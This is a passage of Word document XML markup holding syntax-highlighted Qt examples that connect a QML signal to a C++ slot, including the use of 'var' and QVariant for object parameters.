    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="14295"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4295"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CA76F2" w:rsidRPr="00CA76F2" w:rsidTr="00CA76F2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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com"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="55FFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>// MyItem.qml</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import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QtQuick</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2.0</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Item</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id</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item</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width</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100</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height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100</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signal qmlSignal</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string</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> msg</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MouseArea</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anchors</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fill</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parent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onClicked</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item</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qmlSignal</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="str"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"Hello from QML"</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CA76F2" w:rsidRPr="00CA76F2" w:rsidTr="00CA76F2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="75" w:type="dxa"/>
              <w:left w:w="300" w:type="dxa"/>
              <w:bottom w:w="75" w:type="dxa"/>
              <w:right w:w="300" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>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class</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MyClass</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lang w:val="en-US"/>
              </w:rPr>
              <w:t>public</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QObject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Q_OBJECT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public</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> slots</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lang w:val="en-US"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> cppSlot</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const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QString</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&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>msg</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hyperlink r:id="rId2944" w:anchor="qDebug" w:history="1">
              <w:r w:rsidRPr="00CA76F2">
                <w:rPr>
                  <w:rStyle w:val="pln"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:i/>
                  <w:color w:val="FFFFFF"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>qDebug</w:t>
              </w:r>
            </w:hyperlink>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&lt;&lt;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"Called the C++ slot with message:"</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&lt;&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> msg</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un"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>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int</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> main</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int</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> argc</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lang w:val="en-US"/>
              </w:rPr>
              <w:t>char</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argv</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QGuiApplication</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> app</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argc</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argv</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QQuickView</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> view</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QUrl</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fromLocalFile</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="str"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="AAAAAA"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>"MyItem.qml"</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QObject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item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view</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rootObject</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MyClass</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> myClass</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QObject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connect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item</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SIGNAL</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qmlSignal</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QString</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&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>myClass</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SLOT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cppSlot</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>QString</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view</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show</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rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> app</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>exec</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00CA76F2" w:rsidRPr="00CA76F2" w:rsidRDefault="00CA76F2" w:rsidP="00CA76F2">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>When a QML object type is used as a signal parameter, the parameter should use</w:t>
      </w:r>
      <w:r w:rsidR="0008522D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2945" w:history="1">
        <w:r w:rsidRPr="00064AC7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>var</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0008522D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as the type, and the value should be received in C++ using the</w:t>
      </w:r>
      <w:r w:rsidR="0008522D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2946" w:history="1">
        <w:r w:rsidRPr="00064AC7">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>QVariant</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0008522D">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00064AC7">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA76F2">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="12048" w:type="dxa"/>
        <w:tblInd w:w="-1543" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>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4820"/>
        <w:gridCol w:w="7228"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CA76F2" w:rsidRPr="00CA76F2" w:rsidTr="00064AC7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4820"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com"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="55FFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>// MyItem.qml</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import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QtQuick</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2.0</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typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Item</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id</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item</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width</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100</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height</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lit"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FF55FF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>100</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064AC7" w:rsidRDefault="00CA76F2" w:rsidP="00CA76F2">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:spacing w:after="120"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>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064AC7">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>signal qmlSignal</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>var</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> anObject</w:t>
            </w:r>
            <w:r w:rsidRPr="00064AC7">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="404040"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>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MouseArea</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anchors</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fill</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parent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onClicked</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item</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qmlSignal</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item</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7228" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F9F9F9"/>
            <w:tcMar>
              <w:top w:w="75" w:type="dxa"/>
              <w:left w:w="300" w:type="dxa"/>
              <w:bottom w:w="75" w:type="dxa"/>
              <w:right w:w="300" w:type="dxa"/>
            </w:tcMar>
            <w:hideMark/>
          </w:tcPr>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class</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MyClass</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lang w:val="en-US"/>
              </w:rPr>
              <w:t>public</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QObject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Q_OBJECT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public</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> slots</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lang w:val="en-US"/>
              </w:rPr>
              <w:t>void</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> cppSlot</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const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QVariant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&amp;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>v</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hyperlink r:id="rId2947" w:anchor="qDebug" w:history="1">
              <w:r w:rsidRPr="00CA76F2">
                <w:rPr>
                  <w:rStyle w:val="pln"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                  <w:i/>
                  <w:color w:val="FFFFFF"/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>qDebug</w:t>
              </w:r>
            </w:hyperlink>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&lt;&lt;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"Called the C++ slot with value:"</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&lt;&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> v</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QQuickItem</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item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qobject_cast</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="typ"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="4F9D08"/>
                <w:sz w:val="24"/>
